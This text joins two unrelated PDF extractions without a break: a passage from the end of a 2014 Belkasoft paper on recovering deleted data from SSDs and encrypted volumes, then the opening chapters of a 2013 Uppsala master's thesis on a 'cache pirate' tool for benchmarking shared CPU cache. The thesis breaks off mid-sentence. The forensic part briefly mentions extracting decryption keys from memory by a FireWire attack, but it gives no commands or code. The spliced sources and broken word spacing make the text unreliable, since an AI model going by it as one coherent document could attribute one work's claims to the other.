informati on about the files and directories in the Master File Table (MFT). MFT contains 
information about all files and directories listed in the file system. In other words, each file or 
directory has at least one record in MFT.  
 
In terms of computer forensics, o ne particular feature of MFT is of great interest. Unique to 
NTFS is the ability to store small files directly in the file system . The entire content of a small file 
can be stored as an attribute in side an MFT record, greatly improving reading performance and 
decreasing wasted disk space (“slack” space) , referenced in the previous chapter . 
 
 
As a result, small files being deleted are not going anywhere. Their entire content continues 
residing in the file system. The MFT records are not emptied, and are not affected by the TRIM 
command. This in turn allows investigators recovering such resident files by carving the file 
system.  
 MFT Header  Attributes  Unused space  
Figure 8. MFT record  
  Belk asoft  
http://belkasoft.com  
 
© Belkasoft Research 2014  http://belkasoft.com   
How small does a file have  to be to fit inside an MFT record? Very small. The maximum size of a 
residen t file cannot exceed 982 bytes. Obviously, this severely limits the value of resident files  
for the purpose of digital forensics . 
Encrypted Volumes  
Somewhat counter -intuitively, information deleted from certain types of encrypted volumes 
(some configuratio ns of BitLocker, TrueCrypt, PGP and other  containers) may be easier to 
recover as it may not be affected by the TRIM command. Files deleted from such encrypted 
volumes stored on an SSD drive can be recovered (unless they were specifically wiped by the 
user ) if the investigator knows either the original password or binary decryption keys for the 
volume. Encrypted containers are a big topic, so we’ll cover it in a dedicated chapter.  
 
TRIM on encrypted volumes is a huge topic well worth a dedicated article or even a series of 
articles. With the large number of crypto containers floating around and all the different 
security considerations and available configuration options, determining whether TRIM was 
enabled on a particular encrypted volume is less than stra ightforward. Let’s try assembling a 
brief summary on some of the most popular encryption options.  
Apple FileVault 2  
Introduced with Apple OS X “Lion”, FileVault 2 enables whole -disk encryption. 
More precisely, FileVault 2 enables whole -volume encryption o nly on HFS+ 
volumes (Encrypted HFS).  Apple chose to enable TRIM with File Vault 2 
volumes  on drives. It has the expected security implication of free 
sectors/blocks being revealed.  
Microsoft BitLocker  
Microsoft has its own built -in version of volume -level encryption called 
BitLocker. Microsoft made the same choice as Apple, enabling TRIM on 
BitLocker volumes located on SSD drives. As usual for Microsoft Windows, the 
TRIM command is only available on NTFS volumes.  
TrueCrypt  
TrueCrypt supports TRIM pass -thro ugh on encrypted volumes located on SSD 
drives. The company issued several security warnings in relation to wear-
levelling security issues and the TRIM command revealing information about 
which blocks are in use and which are not. 
(http://www.truecrypt.org/docs/trim -operation  and 
http://www.truecrypt.org/docs/wear -leveling ) 
  Belk asoft  
http://belkasoft.com  
 
© Belkasoft Research 2014  http://belkasoft.com   
PGP Whole Disk Encryption  
By default, PGP whole -disk encryption does not enable TRIM on encrypted 
volumes. However, considering wear -leveling issues of SSD drives, Symantec 
introduced an option to enable TRIM on SSD volumes via a command line 
option: --fast (http://www.symantec.com/connect/forums/pgp -and-ssd-wear -
leveling ).  
 
If an encrypted volume of a fixed size is created, the default behavior is also to encrypt the 
entire content of a file rep resenting the encrypted volume, which disabl es the effect of the 
TRIM command for the contents of the encrypted volume.  
 
More  research is required to investigate these options. At this time one thing is clear: in many 
configurations, including default ones, files deleted from encrypted volumes will not be 
affected by the TRIM command. Which brings us to the question of the correct acquisition of 
PCs with encrypted volumes.  
Forensic Acquisition: The Right Way to Do  
The right way to acquire a PC with a crypto container can be described with the followi ng 
sentence: “If it’s running, don’t turn it off. If it’s off, don’t turn it on.” Indeed, the original 
decryption keys are cached in the computer’s memory, and can be extracted from a LiveRAM 
dump obtained from a running computer by performing a FireWire a ttack . These keys can be 
contained in page files and hibernation files.  Tools such as Passware  can extract decryption files 
from memory dumps and page/hibernation files, decrypting the content of encrypted volumes.  
Reality Steps In: Why Real SSDs are Often  Recoverabl e  
In reality, things may look different from what was just described above in such great technical 
detail. In our lab, we’ve seen hundreds of SSD drives acquired from a variety of computers. 
Surprisingly, Belkasoft Evidence Center was able to su ccessfully carve deleted data from t he 
majority of SSD drives taken from inexpensive laptops and sub -notebooks such as ASUS Eee or 
ASUS Zenbook. Why is it so? There are several reasons to that, mainly “cost savings” and 
“miniaturization” , but sometimes it’ s simply over -engineering . 
  Belk asoft  
http://belkasoft.com  
 
© Belkasoft Research 2014  http://belkasoft.com   
 
 
1. Inexpensive laptops often use flash -based storage, calling that an SSD  in their marketing 
ploy . In fact, in most cases it’s just a slow, inexpensive and fairly small flash -based 
storage having nothing to do with real SSD drive s. 
2. Ultrabooks and sub -notes have no space to fit a full -size SSD drive. They use d to use  SSD 
drives in PCI e form factor  (as opposed to M.2 or mSATA) which did not support the SATA 
protocol . Even if these drives are compatible with the TRIM protocol, Window s does not 
support TRIM on non -ATA devices. As a result, TRIM is not enabled on these drives.  
3. SSD drives are extremely complex devices requiring extremely complex firmware to 
operate. Many SSD drives were released with buggy firmware effectively disabling the 
effects of TRIM and garbage collection. If the user has not upgraded their SSD firmware 
to a working version, the original data may reside on an SSD drive for a long time.  
4. The fairly small (and inexpensive) SSD drives used in many entry -level notebooks  lack 
support for DRAT/DZAT. As a result, del eted (and trimmed) data remain accessible for a 
long time, and can be successfully carved from a promptly captured disk image.  
5. On the other end of the spectrum are the very high -end, over -engineered devices. For  
example, Acer advertises its Aspire S7 -392 as having a RAID 0 SSD . According to Acer 
marketing, “ RAID 0 solid state drives are up to 2X faster than conventional SSDs. Access 
your files and transfer photos and movies quicker than ever! ” 
(http://www.acer.com/aspires7/en_US/ ). This looks like  over -engineering. As TRIM is 
not enabled on RAID SSD’s  in any version of Windows , this ultra -fast non -conventional 
storage system may slow down drastically over time (w hich is exactly why TRIM was 
invented in the first place). For us, this means that any data deleted from these storage 
systems could remain there for at least as long as it would have remained on a 
traditional magnetic disk.  Of course, the use of the right  chipset (such as Intel H67, Z77, 
Z87, H87,  Z68) accompanied with the correct drivers (the latest RST driver from Intel 
allegedly works) can in turn enable TRIM back. However, we are yet to see how this 
works in reality.  (http://www.anandtech.com/show/6477/trim -raid0 -ssd-arrays -work -
with -intel -6series -motherboards -too) 
  Belk asoft  
http://belkasoft.com  
 
© Belkasoft Research 2014  http://belkasoft.com   Conclusion  
SSD forensics remains  different. SSDs self -destroy court evidence,  making it difficult to extract 
deleted files and destroyed information (e.g. , from format ted disks) is close to impossible. 
Numerous exceptions still exist, allowing forensic specialists to access destroyed evidence on 
SSD drives used in certain configura tions.  
 
There has been little progress in SSD development since the publication of our last article on 
SSD forensics in 2012. The factor defining the playing field remains delivering bigger size for less 
money . That aside, compressing SSD controllers appea r to become the norm, making off -chip 
acquisition unpractical and killing all sorts of DIY SSD acquisition hardware.  
 
More SSD drives appear to follow the Deterministic Read After Trim (DRAT) approach defined in 
the SATA standard a long time ago.  This in t urn means that a quick format is likely to instantly 
render deleted evidence inaccessible to standard read operations , even if the drive is acquired 
with a forensic write -blocking imaging hardware immediately after.  
 
SSD drives are getting more complex, ad ding over -provisioning support and using compression 
for better performance and wear leveling.  However, because of the increased complexity, even 
seasoned manufacturers released SSD drives with buggy firmware, causing improper operation 
of TRIM and garbage  collection functionality.  Considering just how complex today’s SSD drives 
have become, it’s surprising the se things do work, even occasionally.  
 
The playfield is constantly changing , but what we know now about SSD forensics gives hope . 
About the Authors  
 Yuri Gubanov  is a renowned computer forensics expert. He is a frequent 
speaker at industry -known conferences such as CEIC, HTCIA, FT -Day, DE -Day, 
ICDDF, TechnoForensics and others. Yuri is the Founder and CEO of Belkasoft, 
the manufacturer of computer f orensic software empowering police 
departments in more than 60 countries. With years of experience in digital 
forensics and security domain, Yuri led forensic training courses for multiple 
law enforcement departments in several countries.  
 
You can reach Yuri Gubanov at  yug@belkasoft.com  or add him to your 
LinkedIn network at  http://linkedin.com/in/yurigubanov . 
  
Oleg Afonin  is an expert in digital foren sics and Belkasoft marketing 
director.  You can reach Oleg Afonin at  research@belkasoft.com . 
 IT 13 048
Examensarbete 30 hp
Juli 2013
Stealing the shared cache for 
fun and profit 
Moncef Mechri
Institutionen för informationsteknologi
Department of Information Technology

 
Teknisk- naturvet enskaplig fakultet 
UTH-enheten 
 
Besöksadress: Ångströmlaboratoriet Lägerhyddsvägen 1 Hus 4, Plan 0  Postadress: 
Box 536 
751 21 Uppsala  Telefon: 018 – 471 30 03  
Telefax: 
018 – 471 30 00  Hemsida: http://www.teknat.uu.se/student
 Abstract
Stealing the shared cache for fun and profit
Moncef Mechri
Cache pirating is a low-overhead method 
created by the Uppsala Architecture 
Research Team (UART) to analyze the 
effect of sharing a CPU cache
among several cores. The cache pirate is 
a program that will actively and
carefully steal a part of the shared 
cache by keeping its working set in it.
The target application can then be 
benchmarked to see its dependency on
the available shared cache capacity. The 
topic of this Master Thesis project
is to implement a cache pirate and use it 
on Ericsson’s systems.
Tryckt av: Reprocentralen ITCSponsor: EricssonIT 13 048Examinator: Ivan ChristoffÄmnesgranskare: David Black-SchafferHandledare: Erik Berg

Contents
Acronyms 2
1 Introduction 3
2 Background information 5
2.1 A dive into modern processors . . . . . . . . . . . . . . . . . . 5
2.1.1 Memory hierarchy . . . . . . . . . . . . . . . . . . . . . 5
2.1.2 Virtual memory . . . . . . . . . . . . . . . . . . . . . . 6
2.1.3 CPU caches . . . . . . . . . . . . . . . . . . . . . . . . 8
2.1.4 Benchmarking the memory hierarchy . . . . . . . . . . 13
3 The Cache Pirate 17
3.1 Monitoring the Pirate . . . . . . . . . . . . . . . . . . . . . . . 18
3.1.1 The original approach . . . . . . . . . . . . . . . . . . 19
3.1.2 Defeating prefetching . . . . . . . . . . . . . . . . . . . 19
3.1.3 Timing . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
3.2 Stealing evenly from every set . . . . . . . . . . . . . . . . . . 21
3.3 How to steal more cache? . . . . . . . . . . . . . . . . . . . . . 22
4 Results 23
4.1 Results from the micro-benchmark . . . . . . . . . . . . . . . 23
4.2 SPEC CPU2006 results . . . . . . . . . . . . . . . . . . . . . . 25
5 Conclusion, related and future work 27
5.1 Related work . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
Acknowledgement 29
List of Figures 30
Bibliography 31
1
Acronyms
LLC Last Level Cache.
LRU Least Recently Used.
OSOperating System.
PIPT Physically-Indexed, Physically-Tagged.
PIVT Physically-Indexed, Virtually-Tagged.
RAM Random Access Memory.
THP Transparent Hugepage.
TLB Translation Lookaside Buffer.
TSC Time-Stamp Counter.
UART Uppsala Architecture Research Team.
VIPT Virtually-Indexed, Physically-Tagged.
VIVT Virtually-Indexed, Virtually-Tagged.
2
Chapter 1
Introduction
In the past, computer architects and processor manufacturers have used
several approaches to increase the performance of their CPUs: Increase in
frequency and transistor count, Out-of-Order execution, branch prediction,
complex pipelines, speculative execution and other techniques have all been
extensively used to improve the performance of our processors.
However, in the mid-2000s, a wall was hit. Architects started to run out
of room for improvement using these traditional approaches [1]. In order to
satisfy Moore’s law, the industry has converged on another approach: Mul-
ticore processors. If we cannot noticeably improve the performance of one
CPU core, why not having several cores in one CPU?
A multicore processor embeds several processing units in one physical
package, thus allowing execution of different execution flows in parallel.
Helped by the constant shrinkage in semiconductor fabrication processes,
this has led to a transition to multicore processors, where several cores are
embedded on a CPU. As of today this transition has been completed, with
multicore processors being everywhere, from supercomputers to mainstream
personal computers and even mobile phones [2].
This revolution has allowed processor makers to keep producing signifi-
cantly faster chips. However, this does not come for free: It imposes a greater
burden on the programmers in order to efficiently exploit this new compu-
tational power, and new problems arose (or were at least greatly amplified).
Most of them should be familiar to the reader: False/true sharing, race con-
ditions, costly communications, scalability issues, etc.
Although multicore processors have by definition duplicate execution units,
3
they still tend to share some resources, like the Last Level Cache (LLC) and
the memory bandwidth. The contention for these shared ressources repre-
sents another class of bottlenecks and performance issues that are much less
known.
In order to study them, the UART has developped two new methods:
Cache pirating [3] and the Bandwidth Bandit[4].
The Cache Pirate is a program that actively and carefully steals a part
of the shared cache. In order to know how sensitive a target application is to
the amount of shared cache available, it is co-run with the Pirate. By stealing
different amount of shared cache, the performance of the target application
can be expressed as a function of the available shared cache.
We will first start by describing how most multicore processors are orga-
nized and how caches work, as well as studying the Freescale P4080 processor.
We will then introduce the micro-benchmark, a cache and memory bench-
mark developped during the Thesis. Later, the pirate will be thoroughly
described. Finally, experiments and results will be shown.
This work is part of a partnership between UART and Ericsson.
4
Chapter 2
Background information
2.1 A dive into modern processors
2.1.1 Memory hierarchy
Memory systems are organized as a Memory hierarchy. Figure 2.1 shows
how a memory hierarchy typically looks like. CPU registers sit on top of
this hierarchy. They are the fastest memory available, but they are also very
limited in numbers and size.
CPU caches come next. They are caches that are used by the CPU to
reduce accesses to the slower level of the memory hierarchy (Mainly, the main
memory). Caches will be explored more thoroughly later.
The main memory, commonly called Random Access Memory (RAM) is
the next level in the hierarchy. It is a type of memory that is off-chip and
that is connected to the CPU by a bus (AMD HyperTransport, Intel Quick-
Path Interconnect, etc.). Throughout the years, RAM has become cheaper
and bigger, and mainstream devices often have several GigaBytes of RAM.
Lower levels of the hierarchy, like the hard drive are several order or
magnitude slower than even the main memory and will not be explored here.
5
Figure 2.1: The memory hierarchy (wikipedia.org)
2.1.2 Virtual memory
Virtual memory is a memory management technique used by most systems
nowadays which allows every process to see a flat and contiguous address
space independent of the underlying physical memory.
The Operating System (OS) maintains in main memory per-process trans-
lation tables of virtual-to-physical addresses. The CPU has a special unit
called memory management unit (MMU) which, in cooperation with the OS,
is used to perform the translation from virtual to physical addresses.
Since the OS’ translation tables live in RAM, accessing them is a slow
process. In order to speed up the translation, the CPU maintains a very
fast translation cache called Translation Lookaside Buffer (TLB) that caches
recently-resolved addresses. The TLB can be seen as a kind of hash ta-
ble where the virtual addresses are the keys and the physical addresses the
results.
When a translation is required, the TLB is looked up. If a matching entry
is found, then we have a TLB-hit and the entry is returned. If the entry is
not found, then we have a TLB-miss. The in-memory translation table is
then searched, and when a valid entry is found, the TLB is updated and the
6
translation restarted.
Paged virtual memory
Most implementations of virtual memory use pages as the basic unit, the
most common page size being 4KB. The memory is divided in chunks, and
the OS translation tables are called Page Tables. In such a setup, the TLB
does not hold per-byte virtual-to-physical translations. Instead, it keeps per-
page translations, and once the right page is found, some lower bits of the
virtual address are used as an offset in this page.
TLBs are unfortunately quite small: Most TLBs have a few dozens of
entries, 64 being a common number, which means that with 4KB pages, only
256KB of memory can be quickly addressed thanks to the TLB. Programs
which requires more memory will thus likely cause a lot of TLB-misses, forc-
ing the processor to waste time traversing the page table (this process is
called a page walk).
Large pages
To reduce this problem, processors can also support other page sizes. For
example, modern x86 processors support 2MB, 4MB and 1GB pages. While
this can waste quite a lot of memory (because even if only one byte is needed,
a whole page is allocated), this can also significantly improve the performance
by increasing the range of memory covered by the TLB.
There is no standard way to allocate large pages: We must rely on OS-
specific functionnalities.
Linux provides two ways of allocating large pages:
•hugetlbfs: hugetlbfs is a mechanism that allows the system administra-
tor to create a pool of large pages that will then be accessible through
a filesystem mount. libhugetlbfs provides a both an API and tools to
make allocating large pages easier [5],
•Transparent Hugepage (THP): THP is a feature that attempts to au-
tomatically back memory areas with large pages when this could be
useful for performance. THP also allows the developer to request a
memory area to be backed by large pages (but with no guaranty of
success) through the madvise() system call. THP is much easier to use
than hugetlbfs [6].
7
Although not originally designed for that, large pages (sometimes called
huge pages) support is fundamental for the Cache Pirate. We will explained
later why.
2.1.3 CPU caches
Throughout the years, processors have kept getting exponentially faster, but
the growth in the main memory performance has not been quite as steady.
To fill the gap and keep our processors busy, CPU architects have been using
caches for a long time.
CPU caches are a kind of memory that is small and expensive but very
fast (one or two orders of magnitude faster than the main memory). Nowa-
days, without caches, a CPU would spend most of its time waiting for data
to arrive from RAM.
Before studying some common cache organizations, it is important to note
that caches don’t store individual bytes. Instead, they store a data block,
called a cacheline. The most common cache line size is 64B.
Direct-mapped caches
Direct-mapped caches are the simplest kind of cache. Figure 2.2 shows how
a direct-mapped cache with the following characteristics is organized:
Size: 32KB Cache line size: 64B
The cache is divided in sets. In a direct-mapped cache, each set can hold
one cache line and a tag. This cache has 512 sets (32KB / 64B)
When the processor wants to read or write in main memory, the cache is
searched first.
The memory address requested is used to locate the data in the cache.
This process works as follows:
Bits 6-14 (9 bits) are used as an index to locate the right set. Once the
set is located, the tag it contains is compared to bits 15-31 (17 bits) in the
address.
If they match, it means that the data block requested is present in the
cache. It can thus be immediately retrieved. This case is called a cache-hit.
The 6 lower bits of the address are then used to select the desired byte
within the cache block.
If they don’t match, then the data needs to be fetched from main memory
and put in the cache, evicting in the process the cache line that was cached
8
Figure 2.2: A direct-mapped cache. Size: 32KB; Cache line size: 64B
in this set. This situation is a cache-miss.
While being simple to implement and understand, direct-mapped caches
have a fundamental weakness: Each set only holds one data block at a time.
In our example, it means that up to 217data blocks can potentially be com-
peting for the same set, leading to a lot of expensive evictions. This kind
of cache misses are called conflict misses and can be triggered even if the
program’s working set is small enough to fit entirely in the cache.
Set-associative caches
A practical way to mitigate conflict misses is to make each set holds several
blocks. A cache is said to be N-way set-associative if each set can hold N
cache lines (and their corresponding tag). These entries in the set are also
called ways. Figure 2.3 shows how the cache from Figure 2.2 would look like
if it is made 4-way set associative.
Since each set now holds 4 cache lines instead of 1, there are 128 sets
(32KB / 64B / 4).
Upon request, bits 6-12 (7 bits) are used to index the cache (find the right
set). Once located, the 4 tags in the set are compared to bits 13-32 (19 bits).
9
Figure 2.3: A 4-ways set-associative cache.. Size: 32KB; Cache line size: 64B
10
If one of them matches, it’s a cache-hit, and the desired byte is extracted
from the corresponding cache line using bits 0-5.
If no tag matches, it’s a cache-miss, and the data needs to be fetched
from main memory. This freshly-fetched block is then cached. To do so, it
is necessary to evict one block from the set (more on that later).
Set-associativity is an effective way to decrease considerably the number
of conflict misses. However, it does not come for free: Costly hardware (in
term of size, price, and power consumption) must be added to select the
correct block in a set as fast as possible.
Fully-associative caches
Fully-associative caches are a special case of set-associative cache with only
one set. Data can end up anywhere in this set, thus eliminating completely
conflict misses.
Fully-associative caches are very expensive because in order to be efficient,
they must be able to compare all the tags contained in the set in parallel,
which is very costly.
For this reason, only very small caches, like L1 TLBs are made fully
associative.
Replacement policy
Each time a new block is brought to the cache, an old one needs to be evicted.
But which one?
Several strategies [7] (or replacement policies) exist to choose the right
cache line to evict, called the victim.
The most common strategy is called Least Recently Used (LRU). This
policy assumes that data recently used will likely be reused soon (temporal
locality) and therefore, as implied by its name, chooses the least recently
used cache line as the victim.
To implement this strategy, each set maintains age bits for each of its
cache line that represent. Each time a cache line is accessed, it becomes the
youngest cache line in the set and the other cache lines age.
Keeping track of the exact age of each cache line can become quite expen-
sive as the associativity grows. In practice, instead of a strict LRU policy,
processors tend to use an approximation of LRU.
11
Hardware prefetching
For the sake of hiding memory latency even further, processor manufacturers
use another technique: Prefetching. The idea behind prefetching is to try
to guess which data will be used soon and prefetch it so that it is already
cached when actually needed.
To do so, the hardware prefetcher, which is a part of the CPU, constantly
looks for common memory access patterns. Here is a common pattern that
every prefetcher should be able to detect:
int array [ 1 0 0 0 ] ;
for (int i = 0 ; i <1000; ++i )
{
array [ i ] = 10;
}
This code simply traverses linearly an array. When executing this code,
the prefetcher will detect the linear memory accesses and will fetch ahead
the data before they are needed.
A prefetcher should also be able to detect strides between each memory
access. For example, the prefetcher would also successfully prefetch data:
int array [ 1 0 0 0 ] ;
for (int i = 0 ; i <1000; i += 2)
{
array [ i ] = 10;
}
Virtual or physical addresses?
This section discusses which address (virtual or physical) is used to address
a cache and the consequences of this choice. This is important because the
pirate needs to control where its data end up in the cache.
We said earlier that some bits from the address are used to index the
cache and some other bits are used as the tag to identify cache lines with the
same set index. But are we talking about the virtual or physical address?
The answer is: It depends. CPU manufacturers are free to choose which
combination of virtual/physical address they want to use for the set indexes
and tags.
Considering that they have to choose whether they use virtual or physical
addresses for the indexes and tags, a cache can be:
12
•Virtually-Indexed, Virtually-Tagged (VIVT): The virtual address is
used for both the index and tag. This has the advantage of having
a low latency, because since the physical address is not required at
all, there is no need to request it to the MMU (which can take time,
especially in the event of a TLB-miss). However, this does not come
without problems since different virtual addresses can refer to the same
physical location (aliasing), and identical virtual addresses can refer to
different physical locations (homonyms)
•Physically-Indexed, Physically-Tagged (PIPT): The physical address
is used for both the index and tag. This scheme avoids aliasing and
homonyms problems altogether but is also slow since nothing can be
done until the physical address has been served by the MMU.
•Virtually-Indexed, Physically-Tagged (VIPT): The virtual address is
used to index the cache and the physical address is used for the tag.
This scheme has a lower latency than PIPT because indexing the cache
and retrieving the physical address can be done in parallel since the
virtual address already gives us the set index.
The last possible combination, Physically-Indexed, Virtually-Tagged
(PIVT), is futile and won’t be discussed.
Generally, smaller, lower latency caches such as L1 caches use VIPT be-
cause it has a lower latency, while larger caches such as LLCs use PIPT to
avoid dealing with aliasing.
2.1.4 Benchmarking the memory hierarchy
In order to understand how exactly a memory hierarchy works, a micro
benchmark has been developped during this thesis work. The benchmark
works as follows:
The benchmark’s main datastructure consists in an array of ”struct elem”
whose size is specified as a command line parameter.
The C structure “elem” is defined like this:
struct elem
{
struct elem∗next ;
long int pad [NPAD] ;
};
13
The next pointer points to the next element to visit in the array (Note
that a pointer is 4-bytes large on 32 bits systems but 8-bytes large on 64 bits
systems.)
The pad element is used to pad the structure in order to control the size
of an element. Varying the padding can greatly vary the benchmark’s behav-
ior and is done by choosing at compile time an appropriate value for NPAD.
An interesting thing to do would be to adjust the padding so that the elem
structure size is similar to the cache line size: Assuming a 64B cache line
size, and considering that the long int type has a size of 4 bytes on Linux
32 bits and 8 bits on Linux 64 bits, choosing NPAD=15 for a 32 bits sys-
tem or NPAD=7 for a 64 bits system would make each element 64 bytes large.
The elements are linked together using the next pointer. There are 2
ways to link the elements:
•Sequentially: The elements are linked sequentially and circularly, so
the last element must point to the first one,
•Randomly: The elements are randomly linked but we must make sure
that each element will be visited exactly once to avoid looping only on
a subset of the array.
The benchmark then times how long it takes to traverse (only using the
next pointer) a fixed number of times.
Finally, dividing the total time by the number of iterations and the num-
ber of elements in the array gives us the average access time per element.
The array size and average access time are then stored in a results file.
In its current state, each execution of the benchmark works only with one
array size. To try different array sizes, it is recommended to use a shell ”for”
loop.
A script able to parse the results files them and plot them using “gnuplot”
is also provided.
The Freescale P4080
Figure 2.4: Freescale P4080 Block Diagram
14
The Freescale P4080 is an octocore PowerPC processor. The development
systems provided by Freescale use Linux. On the other hand, the production
systems use a commercial realtime OS.
Each core runs at 1.5GHz and has 32KB L1 data cache and 32KB L1
instruction cache, as well as a 128KB L2 unified cache.
Those eight cores share a 2MB L3 cache (split into two chunks of 1MB)
as well as two DDR3 memory controllers.
Figure 2.5 displays the micro-benchmark results when configured to oc-
cupy one full cache line per element.
Figure 2.5: micro-benchmark run on the Freescale P4080
We see that up to a working set of 32KB, the benchmark is very low.
However, beyond this point, the benchmark is slowed down. This is because
the working set does not fit anymore in the L1 cache.
A second performance drop occurs when the working set grows beyond
128KB, which matches the size of the L2 cache. Above this point, the working
15
set becomes too big for the L2 cache and we start to hit in the L3 cache,
which has significantly higher latencies.
Another performance penalty occurs when the working set size exceeds
2MB, which is the size of the L3 cache. Beyond this point, the working set
does not fit in the caches anymore and every element needs to be fetched
from the main memory.
The characteristics of the memory hierarchy, such as the size of each cache
level are thus clearly exhibited.
Many more details about the memory hierarchy can be found in Drepper2007[13].
Time measurement
In order to get valid results, it is crucial to be able to measure time accurately.
POSIX systems such as Linux which implement the POSIX Realtime
Extensions provide the clock gettime () function that has an high enough
resolution for our purpose [12].
Since the commercial OS used by Ericsson does not provide an high-
resolution timing function, a timing function that reads the Time-Stamp
Counter (TSC) has been written.
Finally, it is strongly advised to disable any frequency scaling feature
when running the benchmark since it could affect the results.
16
Chapter 3
The Cache Pirate
As we showed previously, modern multicore processors tend to have one or
several private caches per-core as well as one big cache shared by all the
cores. Sharing a cache between cores have several advantages. Some of them
are:
•Each core can, at any time, use as much shared cache space as available.
This is in contrast with private caches where any unused space cannot
be reused by other cores,
•Faster/simpler data sharing and cache-coherency operations by using
the shared cache
However, sharing a cache between cores also means that there can be
contention for this precious resource, where several cores are competing for
space in the cache, evicting each other’s data.
As we saw in the previous section, the LLC is the last rampart before
having to hit the RAM, which has been shown to have significantly longer
access times. Therefore it is important to understand how sharing the LLC
will affect a specific application.
In order to study this, the UART team has created an original approach:
The Cache Pirate.
The Pirate is an application that runs on a core and actively steals a
part of the shared cache to make it look smaller than it actually is. We then
co-run a target application with the pirate and measure its performance with
whatever metric we are interested in (Cycles Per Instruction, execution time,
Frames Per Second, requests/second, and so on). If we repeat this operation
for different cache sizes, we can express the performance of our application
as a function of the shared cache size.
17
The pirate works by looping through a working set of a desired size in
order to prevent it from being evicted from the cache. The size of this working
set represents the amount of cache we are trying to steal.
The pirate must:
•steal the desired amount of cache (no more, no less)
•steal evenly from every set in the cache
•not use any other resource, such as the memory bandwidth
Property 1 is self-explanatory: We want the pirate to steal the amount
of cache we have asked for.
Property 2 is important because we want the cache to look smaller by
reducing its associativity. In order to do that, the pirate needs to steal the
same number of ways in every set. Not doing so could affect applications
that have hotspots in the cache.
Note that this is the approach processor manufacturers tend to use when
they create a lower-end processor with a smaller cache than their higher-end
processors (For example, the L3 cache on Intel Sandy Bridge processors is
made of 2MB 16 ways set-associative chunks. To create a processor with a
3MB L3 cache, they would use 2 chunks of cache but with 4 ways disabled,
reducing the size from 4MB to 3MB).
Property 3 is also important because the pirate must only use the shared
cache. Other resources, like the memory bandwidth should be left untouched
or the results will be biased.
Ensuring that the pirate actually has these properties is the main chal-
lenge of this work.
3.1 Monitoring the Pirate
We have already said that in order to steal cache, the Pirate will loop through
its working set to keep it in the shared cache. However, the Pirate will be
contending with the rest of the system for space in this cache, which means
that its data could get evicted if they become marked as least recently used.
This would lead to two problems:
•The Pirate would not be stealing the desired amount of cache (and thus
violating the first property), and
18
•It would need to fetch the working set (or part of it) from the next
level of the memory hierarchy, which is the RAM. This implies using
the memory bandwidth, and since this resource is also shared with
other cores, it also implies reducing the memory bandwidth available
to the other cores, violating also property 3
A key point is that this issue gets amplified when we try to steal more
cache, because increasing the working set size implies reducing the access
rate, which is the period at which element gets touched. If the access rate
becomes too low, the data could become the least recently used and therefore
get evicted from the cache.
We thus need to check whether the Pirate is able to keep its working set
cached or not.
3.1.1 The original approach
In their original paper, the UART team created a pirate that loops sequen-
tially through its working set.
To check that the Pirate is not using the memory bandwidth, a naive
approach would be to check LLC’s miss ratio (the ratio of memory accesses
that cause a cache miss). Missing in the Last-Level Cache implies fetching
data from the RAM and thus this approach looks reasonable at a first glance.
However, we saw that processors implement prefetching in order to hide
the latency. In this case, a prefetcher could easily detect the sequential ac-
cesses the pirate is doing and prefetch data from main memory before they
are needed. This would reduce drastically the miss ratio and thus hide the
fact that the Pirate is using the memory bandwidth.
To get around that, the UART team uses another metric called the fetch
ratio, which is the ratio of memory accesses that cause a fetch from main
memory [8].
3.1.2 Defeating prefetching
However, the fetch ratio is a metric that is much less known than the miss
ratio. Some systems might also not provide the performance events neces-
sary for measuring it, or those events might only be collectible system-wide,
which is the case on modern processors where the L3 cache and the memory
controller are located in an “uncore” part that provides no easy way to col-
lect data on a per-core basis [10].
19
In order to not need to measure the fetch ratio, a different approach has
been used in this work: The Pirate written during this thesis work iterates
through its working set randomly.
This change is fundamental because since the prefetchers are not unable
to recognize a typical access pattern, they are not able to guess which data
will be needed soon and therefore will not prefetch ahead any data.
Now that the prefetchers will not get in the way anymore, the Pirate’s
miss ratio can be used to monitor the ratio. It should stay as close to 0 as
possible, otherwise it means that the Pirate is fetching data from the RAM.
Monitoring the miss ratio must be done with a profiler able to read the
performance counters, such as Linux’s perf tool [9].
Unfortunately, compared to the original approach, defeating the prefetch-
ers could hit the Pirate’s performance by not being able to prefetch data from
the LLC, leading to a lower access rate.
3.1.3 Timing
There are systems where L3 performance events are also not easily collectible
for each core.
To work around this issue, another way of monitoring the Pirate has been
devised:
We first start the Pirate while the system is idling. The Pirate will then
benchmark the time it takes to iterate over its working set. Once this is done,
our target application can then be started. The pirate will keep timing itself
and compare it to the reference time. If the difference between the reference
time and the new time exceeds a threshold (The current default is 10%, but
it can be changed via an optional command-line switch), it means that the
pirate’s data got evicted from the cache and thus had to read them from the
RAM, which in other words means that the pirate was not able to keep its
working set cached.
This is due to the fact that, as we saw in the previous chapter, the RAM
has significantly higher latencies than caches, and thus missing in the last-
level cache will lead to significantly higher running time for the Pirate that
we can use to detect when the Pirate starts to use the memory bandwidth.
As before, timing is done using the clock gettime () function on Linux or
by manually reading the CPU’s TSC on the OS used in production.
This method has several advantages:
20
•It is very easy to implement
•It is completely cross-platform for systems supporting the clock gettime ()
function (and easily portable to others)
•It does not use any CPU-dependent feature (apart from the TSC if we
read it manually) such as performance counters
•It can be used on systems that do not provide an easy way to get
per-core LLC events
3.2 Stealing evenly from every set
We saw previously that caches are split in sets which are themselves split in
ways.
Some applications might have hotspots in the cache, which means that
their working set is concentrated in a small part of the cache, and failing to
steal evenly from every set could cause either the target application to be
unaffected by the Pirate (if the Pirate does not steal anything or too little )
or to be too affected by the Pirate (If the Pirate steals too much from the
target application’s hotspots).
Ideally, what we would like is to steal the same number of ways in every
set.
As it has been said previously, to determine where each datum is (or will
end up) in the cache, a part of its address is used as an index.
From this, we can derive that a way to control in which set a datum
will end up is to manually choose its address, or at least the part that will
be used as an index. This can be easily done for virtually-indexed caches
by using an aligned allocation routine such as posix memalign () to craft a
virtual address [11].
The Pirate’s working set will be organized as follows:
As with the micro-benchmark, the working set is a densily-packed linked-
list. Each element will occupy a full cache line. The working set is placed in
memory such that the first element ends up in the first set of the cache, the
second in the second set, and so on until we have stolen a way in every set,
at which point the addresses of the following elements (if we want to steal
more than one way) will wrap around.
Example:
Suppose we have the same cache as in the previous section (Size: 32KB;
Cache line size: 64B; Associativity: 4; Number of sets: 128; 32-bits ad-
21
dresses) We saw that bits 0-5 of an address are used to select a byte within a
cache line and that bits 6-12 are used to index the cache. Thus, to use a way
in the first set, the first element of the working set should have an address
